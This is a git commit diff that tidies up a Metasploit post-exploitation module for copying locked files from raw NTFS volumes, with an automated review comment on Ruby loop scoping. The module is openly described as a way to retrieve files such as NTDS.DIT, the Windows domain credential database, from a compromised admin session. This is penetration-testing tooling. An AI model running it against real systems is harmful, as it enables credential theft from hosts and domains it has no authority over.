Merge pull request #1 from Meatballs1/ntfs_read

Small tidyup
bug/bundler_fix
danilbaz 2015-02-07 16:53:37 +01:00
commit dc94e9fb6e
2 changed files with 25 additions and 24 deletions


@ -236,7 +236,7 @@ module Rex
def file(path)
repertory = mft_record_from_mft_num(5)
index_entry = {}
for r in path.split('\\')
path.split('\\').each do |r|
attributes = mft_record_attribute(repertory)
index = index_list_from_attributes(attributes)
unless index.key?(r)
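Review bot: The new `path.split('\\').each do |r|` makes `r` block-local, whereas the replaced `for r in ...` form leaked `r` into the method scope, so any read of `r` after the loop would now raise NameError; the rest of `file` is outside the hunk, so that should be confirmed before merging. A second thing to keep in mind is that `String#split` with a string separator keeps interior empty segments, so a path containing a doubled backslash yields `""` as a component and lands in the `unless index.key?(r)` branch; what that branch does is also outside the hunk, so this is only worth a check, not necessarily a change. A one-line comment such as `# each path component must be an exact key of the directory index` above the `unless` would make the lookup contract explicit.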


@ -3,26 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/parser/fs/ntfs'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
require "rex/parser/fs/ntfs"
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows File Gathering In Raw NTFS',
'Description' => %q{
'Description' => %q(
This module gather file using the raw NTFS device, bypassing some Windows restriction.
Gather file from disk bypassing restriction like already open file with write right lock.
Can be used to retreive file like NTDS.DIT
},
Can be used to retreive file like NTDS.DIT),
'License' => 'MSF_LICENSE',
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
'References' => [
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
]
))
register_options(
[
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
def run
winver = sysinfo["OS"]
if winver =~ /2000/i
print_error("Module not valid for Windows 2000")
return
end
unless is_admin?
print_error("You don't have enough privileges")
return
end
fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
file_path = datastore['FILE_PATH']
r = client.railgun.kernel32.GetFileAttributesA(file_path)
if r['GetLastError'] != 0
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts")
return nil
fail_with(
Exploit::Failure::BadConfig,
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
)
end
drive = file_path[0, 2]
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE",
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
'GENERIC_READ',
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_FLAG_WRITE_THROUGH',
0)
if r['GetLastError'] != 0
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}")
return nil
fail_with(
Exploit::Failure::Unknown,
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
end
@handle = r['return']
print_status("Successfuly opened #{drive}")
begin
fs = Rex::Parser::NTFS.new(self)
print_status("Trying gather #{file_path}")
print_status("Trying to gather #{file_path}")
path = file_path[3, file_path.length - 3]
data = fs.file(path)
file_name = file_path.split("\\")[-1]
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
print_good("Saving file : #{stored_path}")
rescue ::Exception => e
print_error("Post failed : #{e.backtrace}")
ensure
client.railgun.kernel32.CloseHandle(@handle)
end